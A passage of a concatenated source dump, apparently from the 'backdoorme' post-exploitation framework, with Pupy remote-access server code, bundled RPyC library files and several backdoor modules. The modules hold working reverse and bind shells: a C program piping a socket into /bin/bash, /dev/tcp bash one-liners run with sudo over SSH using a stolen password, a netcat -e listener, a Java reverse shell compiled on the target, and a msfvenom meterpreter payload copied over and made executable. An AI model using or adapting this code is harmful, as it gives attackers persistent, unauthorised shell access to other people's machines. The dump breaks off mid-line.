POSSIBILITY OF SUCH DAMAGE 15 | # -------------------------------------------------------------- 16 | 17 | import rpyc.core.service 18 | import rpyc 19 | import threading 20 | import sys 21 | import ssl 22 | 23 | class PupyService(rpyc.Service): 24 | def __init__(self, *args, **kwargs): 25 | super(PupyService, self).__init__(*args, **kwargs) 26 | self.pupy_srv=glob_pupyServer 27 | def on_connect(self): 28 | # code that runs when a connection is created 29 | # (to init the serivce, if needed) 30 | self._conn._config.update(dict( 31 | allow_safe_attrs = True, 32 | allow_public_attrs = False, 33 | allow_pickle = False, 34 | allow_getattr = True, 35 | allow_setattr = False, 36 | allow_delattr = False, 37 | import_custom_exceptions = False, 38 | instantiate_custom_exceptions = False, 39 | instantiate_oldstyle_exceptions = False, 40 | )) 41 | #self._conn._config["safe_attrs"].add("__iter__") 42 | #self._conn._config["safe_attrs"].add("readline") 43 | self.modules=None 44 | 45 | #some aliases : 46 | self.namespace=self._conn.root.namespace 47 | self.execute=self._conn.root.execute 48 | self.exit=self._conn.root.exit 49 | self.eval=self._conn.root.eval 50 | self.builtin=self.modules.__builtin__ 51 | self.builtins=self.modules.__builtin__ 52 | self.exposed_stdin=sys.stdin 53 | self.exposed_stdout=sys.stdout 54 | self.exposed_stderr=sys.stderr 55 | self.pupy_srv.add_client(self) 56 | 57 | def on_disconnect(self): 58 | self.pupy_srv.remove_client(self) 59 | 60 | def exposed_set_modules(self, modules): 61 | self.modules=modules 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/PythonCompleter.py: -------------------------------------------------------------------------------- 1 | import __builtin__ 2 | 3 | __all__ = ["PythonCompleter"] 4 | 5 | class PythonCompleter: 6 | def __init__(self, local_ns=None, global_ns=None): 7 | if local_ns is not None: 8 | self.local_ns=local_ns 9 | else: 10 | self.local_ns={} 11 | if global_ns is not None: 12 | self.global_ns=global_ns 13 | else: 14 | self.global_ns={} 15 | 16 | def complete(self, text, state): 17 | if state == 0: 18 | if "." in text: 19 | self.matches = self.attr_matches(text) 20 | else: 21 | self.matches = self.var_matches(text) 22 | try: 23 | return self.matches[state] 24 | except IndexError: 25 | return None 26 | 27 | def _callable_postfix(self, val, word): 28 | if hasattr(val, '__call__'): 29 | word = word + "(" 30 | return word 31 | 32 | def var_matches(self, text): 33 | import re 34 | m = re.match(r"(\w*)", text) 35 | if not m: 36 | return [] 37 | words=[x for x in self.local_ns.iterkeys() if x.startswith(m.group(1))] 38 | if "__builtins__" in words: 39 | words.remove("__builtins__") 40 | return words 41 | 42 | def attr_matches(self, text): 43 | """Compute matches when text contains a dot. 44 | 45 | Assuming the text is of the form NAME.NAME....[NAME], and is 46 | evaluatable in self.namespace, it will be evaluated and its attributes 47 | (as revealed by dir()) are used as possible completions. (For class 48 | instances, class members are also considered.) 49 | 50 | WARNING: this can still invoke arbitrary C code, if an object 51 | with a __getattr__ hook is evaluated. 52 | """ 53 | import re 54 | bsw="[a-zA-Z0-9_\\(\\)\\[\\]\"']" 55 | m = re.match(r"(\w+(\.\w+)*)\.(\w*)".replace(r"\w",bsw), text) 56 | if not m: 57 | return [] 58 | 59 | expr, attr = m.group(1, 3) 60 | try: 61 | try: 62 | thisobject = eval(expr, self.global_ns, self.local_ns) 63 | except NameError as e: 64 | """ 65 | print str(e) 66 | try: 67 | exec "import %s"%expr in global_ns, self.local_ns 68 | thisobject = eval(expr, global_ns, self.local_ns) 69 | except ImportError: 70 | pass 71 | """ 72 | except Exception as e: 73 | return [] 74 | 75 | # get the content of the object, except __builtins__ 76 | words = dir(thisobject) 77 | if "__builtins__" in words: 78 | words.remove("__builtins__") 79 | 80 | if hasattr(thisobject, '__class__'): 81 | words.append('__class__') 82 | words.extend(get_class_members(thisobject.__class__)) 83 | words=[x for x in words if not x.startswith("__")] 84 | matches = [] 85 | n = len(attr) 86 | for word in words: 87 | if word[:n] == attr and hasattr(thisobject, word): 88 | val = getattr(thisobject, word) 89 | word = self._callable_postfix(val, "%s.%s" % (expr, word)) 90 | matches.append(word) 91 | return matches 92 | 93 | def get_class_members(klass): 94 | ret = dir(klass) 95 | if hasattr(klass,'__bases__'): 96 | for base in klass.__bases__: 97 | ret = ret + get_class_members(base) 98 | return ret 99 | 100 | if __name__=="__main__": 101 | import code 102 | import readline 103 | readline.set_completer(PythonCompleter().complete) 104 | readline.parse_and_bind('tab: complete') 105 | code.interact() 106 | 107 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/pupylib/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/pupylib/utils/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/utils/network.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | import subprocess 3 | 4 | def get_local_ip(iface = 'eth0'): 5 | try: 6 | return subprocess.check_output(["ifconfig", iface]).split("\n")[1].split()[1][5:] 7 | #TODO same for windows 8 | except Exception: 9 | return None 10 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/utils/pe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import pefile 5 | 6 | def get_pe_arch(*args, **kwargs): 7 | pe=None 8 | if args: 9 | pe = pefile.PE(args[0], fast_load=True) 10 | elif "data" in kwargs: 11 | pe = pefile.PE(data=kwargs["data"], fast_load=True) 12 | else: 13 | raise NameError("at least a path or data must be supplied to get_arch") 14 | if pe.OPTIONAL_HEADER.Magic==0x010b: 15 | return "32bit" 16 | elif pe.OPTIONAL_HEADER.Magic==0x020b: 17 | return "64bit" 18 | else: 19 | return "UNKNOWN" 20 | 21 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupysh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | # -------------------------------------------------------------- 5 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 6 | # All rights reserved. 7 | # 8 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | # 10 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | # 12 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 13 | # 14 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 15 | # 16 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 17 | # -------------------------------------------------------------- 18 | 19 | import pupylib.PupyServer 20 | import pupylib.PupyCmd 21 | import logging 22 | import time 23 | import traceback 24 | import argparse 25 | import os 26 | import os.path 27 | 28 | __author__='Nicolas VERDIER' 29 | __version__='v1.0.1-alpha' 30 | 31 | def print_version(): 32 | print("Pupy - %s"%(__version__)) 33 | 34 | if __name__=="__main__": 35 | if os.path.dirname(__file__): 36 | os.chdir(os.path.dirname(__file__)) 37 | parser = argparse.ArgumentParser(prog='ptrconsole', description="Pupy console") 38 | parser.add_argument('--log-lvl', help="change log verbosity", dest="loglevel", choices=["DEBUG","INFO","WARNING","ERROR"], default="WARNING") 39 | parser.add_argument('--version', help="print version and exit", action='store_true') 40 | args=parser.parse_args() 41 | if args.version: 42 | print_version() 43 | exit(0) 44 | loglevel=logging.WARNING 45 | if args.loglevel=="ERROR": 46 | loglevel=logging.ERROR 47 | elif args.loglevel=="DEBUG": 48 | loglevel=logging.DEBUG 49 | elif args.loglevel=="INFO": 50 | loglevel=logging.INFO 51 | else: 52 | loglevel=logging.WARNING 53 | logging.basicConfig(format='%(asctime)-15s - %(levelname)-5s - %(message)s') 54 | logging.getLogger().setLevel(loglevel) 55 | 56 | pupyServer=pupylib.PupyServer.PupyServer() 57 | try: 58 | import __builtin__ as builtins 59 | except ImportError: 60 | import builtins 61 | builtins.glob_pupyServer=pupyServer # dirty ninja trick for this particular case avoiding to touch rpyc source code 62 | pupyServer.start() 63 | pcmd=pupylib.PupyCmd.PupyCmd(pupyServer) 64 | while True: 65 | try: 66 | pcmd.cmdloop() 67 | except Exception as e: 68 | print(traceback.format_exc()) 69 | pcmd.intro='' 70 | 71 | 72 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | :: 3 | 4 | ##### ##### #### 5 | ## ## ## ## ## #### 6 | ## ## ## ## ## # 7 | ##### ##### ## ## ## ## 8 | ## ## ## ## ## ## # 9 | ## ## ## ### ## ### 10 | ## ## ## ## ##### 11 | -------------------- ## ------------------------------------------ 12 | ## 13 | 14 | Remote Python Call (RPyC) 15 | Licensed under the MIT license (see `LICENSE` file) 16 | 17 | A transparent, symmetric and light-weight RPC and distributed computing 18 | library for python. 19 | 20 | Usage:: 21 | 22 | >>> import rpyc 23 | >>> c = rpyc.connect_by_service("SERVICENAME") 24 | >>> print c.root.some_function(1, 2, 3) 25 | 26 | Classic-style usage:: 27 | 28 | >>> import rpyc 29 | >>> # `hostname` is assumed to be running a slave-service server 30 | >>> c = rpyc.classic.connect("hostname") 31 | >>> print c.execute("x = 5") 32 | None 33 | >>> print c.eval("x + 2") 34 | 7 35 | >>> print c.modules.os.listdir(".") #doctest: +ELLIPSIS 36 | [...] 37 | >>> print c.modules["xml.dom.minidom"].parseString("") #doctest: +ELLIPSIS 38 | 39 | >>> f = c.builtin.open("foobar.txt", "rb") #doctest: +SKIP 40 | >>> print f.read(100) #doctest: +SKIP 41 | ... 42 | 43 | """ 44 | from rpyc.core import (SocketStream, TunneledSocketStream, PipeStream, Channel, 45 | Connection, Service, BaseNetref, AsyncResult, GenericException, 46 | AsyncResultTimeout, VoidService, SlaveService) 47 | from rpyc.utils.factory import (connect_stream, connect_channel, connect_pipes, 48 | connect_stdpipes, connect, ssl_connect, discover, connect_by_service, connect_subproc, 49 | connect_thread, ssh_connect) 50 | from rpyc.utils.helpers import async, timed, buffiter, BgServingThread, restricted 51 | from rpyc.utils import classic 52 | from rpyc.version import version as __version__ 53 | 54 | __author__ = "Tomer Filiba (tomerfiliba@gmail.com)" 55 | 56 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/core/__init__.py: -------------------------------------------------------------------------------- 1 | from rpyc.core.stream import SocketStream, TunneledSocketStream, PipeStream 2 | from rpyc.core.channel import Channel 3 | from rpyc.core.protocol import Connection 4 | from rpyc.core.netref import BaseNetref 5 | from rpyc.core.async import AsyncResult, AsyncResultTimeout 6 | from rpyc.core.service import Service, VoidService, SlaveService 7 | from rpyc.core.vinegar import GenericException 8 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/core/channel.py: -------------------------------------------------------------------------------- 1 | """ 2 | *Channel* is an abstraction layer over streams that works with *packets of data*, 3 | rather than an endless stream of bytes, and adds support for compression. 4 | """ 5 | from rpyc.lib import safe_import 6 | from rpyc.lib.compat import Struct, BYTES_LITERAL 7 | zlib = safe_import("zlib") 8 | 9 | # * 64 bit length field? 10 | # * separate \n into a FlushingChannel subclass? 11 | # * add thread safety as a subclass? 12 | 13 | class Channel(object): 14 | """Channel implementation. 15 | 16 | Note: In order to avoid problems with all sorts of line-buffered transports, 17 | we deliberately add ``\\n`` at the end of each frame. 18 | """ 19 | 20 | COMPRESSION_THRESHOLD = 3000 21 | COMPRESSION_LEVEL = 1 22 | FRAME_HEADER = Struct("!LB") 23 | FLUSHER = BYTES_LITERAL("\n") # cause any line-buffered layers below us to flush 24 | __slots__ = ["stream", "compress"] 25 | 26 | def __init__(self, stream, compress = True): 27 | self.stream = stream 28 | if not zlib: 29 | compress = False 30 | self.compress = compress 31 | def close(self): 32 | """closes the channel and underlying stream""" 33 | self.stream.close() 34 | @property 35 | def closed(self): 36 | """indicates whether the underlying stream has been closed""" 37 | return self.stream.closed 38 | def fileno(self): 39 | """returns the file descriptor of the underlying stream""" 40 | return self.stream.fileno() 41 | def poll(self, timeout): 42 | """polls the underlying steam for data, waiting up to *timeout* seconds""" 43 | return self.stream.poll(timeout) 44 | def recv(self): 45 | """Receives the next packet (or *frame*) from the underlying stream. 46 | This method will block until the packet has been read completely 47 | 48 | :returns: string of data 49 | """ 50 | header = self.stream.read(self.FRAME_HEADER.size) 51 | length, compressed = self.FRAME_HEADER.unpack(header) 52 | data = self.stream.read(length + len(self.FLUSHER))[:-len(self.FLUSHER)] 53 | if compressed: 54 | data = zlib.decompress(data) 55 | return data 56 | def send(self, data): 57 | """Sends the given string of data as a packet over the underlying 58 | stream. Blocks until the packet has been sent. 59 | 60 | :param data: the byte string to send as a packet 61 | """ 62 | if self.compress and len(data) > self.COMPRESSION_THRESHOLD: 63 | compressed = 1 64 | data = zlib.compress(data, self.COMPRESSION_LEVEL) 65 | else: 66 | compressed = 0 67 | header = self.FRAME_HEADER.pack(len(data), compressed) 68 | buf = header + data + self.FLUSHER 69 | self.stream.write(buf) 70 | 71 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/core/consts.py: -------------------------------------------------------------------------------- 1 | """ 2 | Constants used by the protocol 3 | """ 4 | 5 | # messages 6 | MSG_REQUEST = 1 7 | MSG_REPLY = 2 8 | MSG_EXCEPTION = 3 9 | 10 | # boxing 11 | LABEL_VALUE = 1 12 | LABEL_TUPLE = 2 13 | LABEL_LOCAL_REF = 3 14 | LABEL_REMOTE_REF = 4 15 | 16 | # action handlers 17 | HANDLE_PING = 1 18 | HANDLE_CLOSE = 2 19 | HANDLE_GETROOT = 3 20 | HANDLE_GETATTR = 4 21 | HANDLE_DELATTR = 5 22 | HANDLE_SETATTR = 6 23 | HANDLE_CALL = 7 24 | HANDLE_CALLATTR = 8 25 | HANDLE_REPR = 9 26 | HANDLE_STR = 10 27 | HANDLE_CMP = 11 28 | HANDLE_HASH = 12 29 | HANDLE_DIR = 13 30 | HANDLE_PICKLE = 14 31 | HANDLE_DEL = 15 32 | HANDLE_INSPECT = 16 33 | HANDLE_BUFFITER = 17 34 | HANDLE_OLDSLICING = 18 35 | 36 | # optimized exceptions 37 | EXC_STOP_ITERATION = 1 38 | 39 | # DEBUG 40 | #for k in globals().keys(): 41 | # globals()[k] = k 42 | 43 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/core/reactor.py: -------------------------------------------------------------------------------- 1 | import os 2 | import select 3 | import threading 4 | 5 | 6 | class SelectReactor(object): 7 | TIMEOUT = 0.5 if os.name == "nt" else None 8 | def __init__(self): 9 | self._active = False 10 | self._readfds = set() 11 | def register_read(self, fileobj): 12 | self._readfds.append(fileobj) 13 | def run(self): 14 | self._active = True 15 | while self._active: 16 | rlist, _, _ = select.select(self._readfds, (), (), self.TIMEOUT) 17 | for fileobj in rlist: 18 | data = fileobj.recv(16000) 19 | if not data: 20 | fileobj.close() 21 | self._readfds.discard(fileobj) 22 | 23 | 24 | _reactor = SelectReactor() 25 | 26 | def _reactor_thread(): 27 | pass 28 | 29 | 30 | _thd = None 31 | def start_reactor(): 32 | global _thd 33 | if _thd is None: 34 | raise ValueError("already started") 35 | _thd = threading.Thread("rpyc reactor thread", target = _reactor_thread) 36 | _thd.setDaemon(True) 37 | _thd.start() 38 | 39 | 40 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/experimental/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/rpyc/experimental/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/utils/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Utilities (not part of the core protocol) 3 | """ 4 | 5 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/utils/authenticators.py: -------------------------------------------------------------------------------- 1 | """ 2 | An *authenticator* is basically a callable object that takes a socket and 3 | "authenticates" it in some way. Upon success, it must return a tuple containing 4 | a **socket-like** object and its **credentials** (any object), or raise an 5 | :class:`AuthenticationError` upon failure. The credentials are any object you wish to 6 | associate with the authentication, and it's stored in the connection's 7 | :data:`configuration dict ` under the key "credentials". 8 | 9 | There are no constraints on what the authenticators, for instance:: 10 | 11 | def magic_word_authenticator(sock): 12 | if sock.recv(5) != "Ma6ik": 13 | raise AuthenticationError("wrong magic word") 14 | return sock, None 15 | 16 | RPyC comes bundled with an authenticator for ``SSL`` (using certificates). 17 | This authenticator, for instance, both verifies the peer's identity and wraps the 18 | socket with an encrypted transport (which replaces the original socket). 19 | 20 | Authenticators are used by :class:`servers ` to 21 | validate an incoming connection. Using them is pretty trivial :: 22 | 23 | s = ThreadedServer(...., authenticator = magic_word_authenticator) 24 | s.start() 25 | """ 26 | import sys 27 | from rpyc.lib import safe_import 28 | ssl = safe_import("ssl") 29 | 30 | class AuthenticationError(Exception): 31 | """raised to signal a failed authentication attempt""" 32 | pass 33 | 34 | 35 | class SSLAuthenticator(object): 36 | """An implementation of the authenticator protocol for ``SSL``. The given 37 | socket is wrapped by ``ssl.wrap_socket`` and is validated based on 38 | certificates 39 | 40 | :param keyfile: the server's key file 41 | :param certfile: the server's certificate file 42 | :param ca_certs: the server's certificate authority file 43 | :param cert_reqs: the certificate requirements. By default, if ``ca_cert`` is 44 | specified, the requirement is set to ``CERT_REQUIRED``; 45 | otherwise it is set to ``CERT_NONE`` 46 | :param ciphers: the list of ciphers to use, or ``None``, if you do not wish 47 | to restrict the available ciphers. New in Python 2.7/3.2 48 | :param ssl_version: the SSL version to use 49 | 50 | Refer to `ssl.wrap_socket `_ 51 | for more info. 52 | """ 53 | 54 | def __init__(self, keyfile, certfile, ca_certs = None, cert_reqs = None, 55 | ssl_version = None, ciphers = None): 56 | self.keyfile = keyfile 57 | self.certfile = certfile 58 | self.ca_certs = ca_certs 59 | self.ciphers = ciphers 60 | if cert_reqs is None: 61 | if ca_certs: 62 | self.cert_reqs = ssl.CERT_REQUIRED 63 | else: 64 | self.cert_reqs = ssl.CERT_NONE 65 | else: 66 | self.cert_reqs = cert_reqs 67 | if ssl_version is None: 68 | self.ssl_version = ssl.PROTOCOL_TLSv1 69 | else: 70 | self.ssl_version = ssl_version 71 | 72 | def __call__(self, sock): 73 | kwargs = dict(keyfile = self.keyfile, certfile = self.certfile, 74 | server_side = True, ca_certs = self.ca_certs, cert_reqs = self.cert_reqs, 75 | ssl_version = self.ssl_version) 76 | if self.ciphers is not None: 77 | kwargs["ciphers"] = self.ciphers 78 | try: 79 | sock2 = ssl.wrap_socket(sock, **kwargs) 80 | except ssl.SSLError: 81 | ex = sys.exc_info()[1] 82 | raise AuthenticationError(str(ex)) 83 | return sock2, sock2.getpeercert() 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/rpyc/version.py: -------------------------------------------------------------------------------- 1 | version = (3, 3, 0) 2 | version_string = "3.3.0" 3 | release_date = "2014.06.27" 4 | 5 | -------------------------------------------------------------------------------- /backdoors/shell/__x86/Cback.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | //IP, then port 9 | 10 | int main(int argc, char *argv[]){ 11 | //if(argc != 3) { 12 | // printf("Usage: ./a.out [IP] [PORT\n"); 13 | // exit(0); 14 | //} 15 | int socket_info, pid, connection, port = atoi(argv[2]); 16 | struct sockaddr_in info; 17 | char ip[20]; 18 | strcpy(ip, argv[1]); 19 | socket_info = socket(AF_INET, SOCK_STREAM, 0); 20 | info.sin_family = AF_INET; 21 | info.sin_port = htons(port); 22 | info.sin_addr.s_addr = inet_addr(ip); 23 | connection = connect(socket_info, (struct sockaddr *)&info, sizeof(struct sockaddr)); 24 | if((pid = fork()) < 0) 25 | printf("Fork Failed\n"); 26 | else if(pid > 0) 27 | wait(NULL); 28 | else{ 29 | dup2(socket_info,0); 30 | dup2(socket_info,1); 31 | dup2(socket_info,2); 32 | execlp("/bin/bash", "/bin/bash", NULL); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /backdoors/shell/__x86/x86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__x86/x86 -------------------------------------------------------------------------------- /backdoors/shell/bash.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Bash(Backdoor): 4 | prompt = Fore.RED + "(bash) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Bash backdoor..." 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53923, "port to connect to", True), 12 | } 13 | 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = INFO + "Uses a simple bash command to connect to a specific ip and port combination, and pipes its input into a bash shell." 17 | 18 | def get_command(self): 19 | return "sudo -S nohup bash -i >& /dev/tcp/" + self.core.localIP + "/%s 0>&1" % self.get_value("port") 20 | 21 | def do_exploit(self, args): 22 | port = self.get_value("port") 23 | target = self.core.curtarget 24 | print(GOOD + "Initializing backdoor...") 25 | self.listen(target.pword) 26 | target.ssh.exec_command(self.get_command()) 27 | print(GOOD + "Bash Backdoor on port " + str(port) + " attempted.") 28 | for mod in self.modules.keys(): 29 | print(INFO + "Attempting to execute " + mod.name + " module...") 30 | mod.exploit() 31 | 32 | -------------------------------------------------------------------------------- /backdoors/shell/bash2.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import subprocess 3 | import threading 4 | 5 | class Bash2(Backdoor): 6 | prompt = Fore.RED + "(bash2) " + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using second Bash module..." 11 | self.core = core 12 | self.options = { 13 | "port" : Option("port", 53923, "port to connect to", True), 14 | } 15 | self.allow_modules = True 16 | self.modules = {} 17 | self.help_text = INFO + "A slightly different (and more reliable) version of the other bash backdoor." 18 | 19 | def get_command(self): 20 | #return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; bash <&196 >&196 2>&196" % self.get_value("port") 21 | return "sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sudo -S bash <&196 >&196 2>&196" % self.get_value("port") 22 | 23 | def do_exploit(self, args): 24 | port = self.get_value("port") 25 | target = self.core.curtarget 26 | print(GOOD + "Initializing backdoor...") 27 | #input("Run the following command: nc -vnlp %s in another shell to start the listener." % port) 28 | self.listen(target.pword, "none") 29 | target.ssh.exec_command(self.get_command()) 30 | 31 | for mod in self.modules.keys(): 32 | print(INFO + "Attempting to execute " + mod.name + " module...") 33 | mod.exploit() 34 | -------------------------------------------------------------------------------- /backdoors/shell/bind/netcat_traditional.py: -------------------------------------------------------------------------------- 1 | from backdoor import * 2 | 3 | class Netcat_Traditional(Backdoor): 4 | prompt = Fore.RED + "(nct) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using netcat-traditional module" 9 | self.core = core 10 | self.options = { 11 | "port" : Option("port", 53926, "port to connect to", True), 12 | } 13 | self.modules = {} 14 | self.allow_modules = True 15 | self.help_text = INFO + "Utilizes netcat's traditional -e option to create a reverse shell." 16 | 17 | def get_command(self): 18 | return "echo " + self.core.curtarget.pword + " | sudo -S nohup ./nc.traditional -l -p %s -e /bin/bash" % self.get_value("port") 19 | 20 | def do_exploit(self, args): 21 | target = self.core.curtarget 22 | port = self.get_value("port") 23 | print(INFO + "Shipping netcat-traditional package.") 24 | target.scpFiles(self, '/bin/nc.traditional', False) 25 | print(GOOD + "Initializing backdoor on port %s..." % port) 26 | target.ssh.exec_command(self.get_command()) 27 | print(GOOD + "Backdoor attempted. Use nc " + target.hostname + " %s." % port) 28 | for mod in self.modules.keys(): 29 | print(INFO + "Attempting to execute " + mod.name + " module...") 30 | mod.exploit() 31 | -------------------------------------------------------------------------------- /backdoors/shell/java.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import time 3 | 4 | class Java(Backdoor): 5 | prompt = Fore.RED + "(Java) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using Java module..." 10 | self.core = core 11 | self.options = { 12 | "port" : Option("port", 53938, "port to connect to", True), 13 | } 14 | self.modules = {} 15 | self.allow_modules = True 16 | self.help_text = INFO + "Java backdoor using /bin/bash" 17 | 18 | def get_command(self): 19 | return "echo " + self.core.curtarget.pword + " | sudo -S java Back " + str(self.core.localIP) + " " + str(self.get_value("port")) 20 | 21 | def do_exploit(self, args): 22 | self.listen(prompt="none") 23 | 24 | program = "import java.net.Socket; \ 25 | import java.io.InputStream; \ 26 | import java.io.OutputStream; \ 27 | \ 28 | public class Back { \ 29 | public static void main(String args[]) { \ 30 | String host=args[0]; \ 31 | int port=Integer.parseInt(args[1]); \ 32 | try { \ 33 | Process p=new ProcessBuilder(\"/bin/bash\").redirectErrorStream(true).start(); \ 34 | Socket s=new Socket(host,port); \ 35 | InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream(); \ 36 | OutputStream po=p.getOutputStream(), so=s.getOutputStream(); \ 37 | while(!s.isClosed()){ \ 38 | while(pi.available()>0) \ 39 | so.write(pi.read()); \ 40 | while(pe.available()>0) \ 41 | so.write(pe.read()); \ 42 | while(si.available()>0) \ 43 | po.write(si.read()); \ 44 | so.flush(); \ 45 | po.flush(); \ 46 | Thread.sleep(50); \ 47 | try { \ 48 | p.exitValue(); \ 49 | break; \ 50 | } \ 51 | catch (Exception e){ \ 52 | } \ 53 | } \ 54 | p.destroy(); \ 55 | s.close(); \ 56 | } \ 57 | catch (Exception e){} \ 58 | } \ 59 | }" 60 | 61 | 62 | print(INFO + "Moving backdoor...") 63 | self.core.curtarget.ssh.exec_command("echo \"" + program + "\" > Back.java") 64 | time.sleep(.25) 65 | self.core.curtarget.ssh.exec_command("javac Back.java") 66 | print(INFO + "Compiling...") 67 | time.sleep(2) 68 | self.core.curtarget.ssh.exec_command(self.get_command()) 69 | print(GOOD + "Java backdoor on %s attempted." % self.get_value("port")) 70 | 71 | 72 | for mod in self.modules.keys(): 73 | print(INFO + "Attempting to execute " + mod.name + " module...") 74 | mod.exploit() -------------------------------------------------------------------------------- /backdoors/shell/metasploit.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Metasploit(Backdoor): 4 | prompt = Fore.RED + "(msf) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using Metasploit backdoor..." 9 | self.core = core 10 | self.payload = "linux/x86/meterpreter/reverse_tcp" 11 | self.options = { 12 | "payload" : Option("payload", "linux/x86/meterpreter/reverse_tcp", "payload to deploy in backdoor", True), 13 | "lport" : Option("lport", 4444, "local port to connect back on", True), 14 | "lhost" : Option("lhost", core.localIP, "local IP to connect back to", True), 15 | "format" : Option("format", "elf", "format to write the backdoor to", True), 16 | "encoder" : Option("encoder", "none", "encoder to use for the backdoor", False), 17 | "name" : Option("name", "initd", "name of the backdoor", False) 18 | } 19 | self.modules = {} 20 | self.allow_modules = True 21 | self.help_text = INFO + "Employs msfvenom to create a reverse_tcp binary on the target, then runs that binary to start a meterpreter shell." 22 | 23 | def get_command(self): 24 | return "nohup ./%s > /dev/null" % self.get_value("name") 25 | 26 | def do_exploit(self, args): 27 | port = self.get_value("lport") 28 | payload = self.get_value("payload") 29 | name = self.get_value("name") 30 | bformat = self.get_value("format") 31 | target = self.core.curtarget 32 | #os.system("msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp lhost=10.1.0.1 lport=4444 --platform=Linux -o initd -f elf -e x86/shikata_ga_nai") #% ip_address) 33 | os.system("msfvenom -p %s LHOST=%s LPORT=%s -f %s X -o %s" % (payload, self.core.localIP, port, bformat, name)) 34 | target.scpFiles(self, name, False) 35 | print(GOOD + "Backdoor script moved") 36 | target.ssh.exec_command("chmod +x "+name) 37 | print(GOOD + "Backdoor attempted on port %s. Backdoor will attempt to connect immediately upon launch. To access, open msfconsole and run:" % port) 38 | print("> use multi/handler") 39 | print("> set PAYLOAD %s" 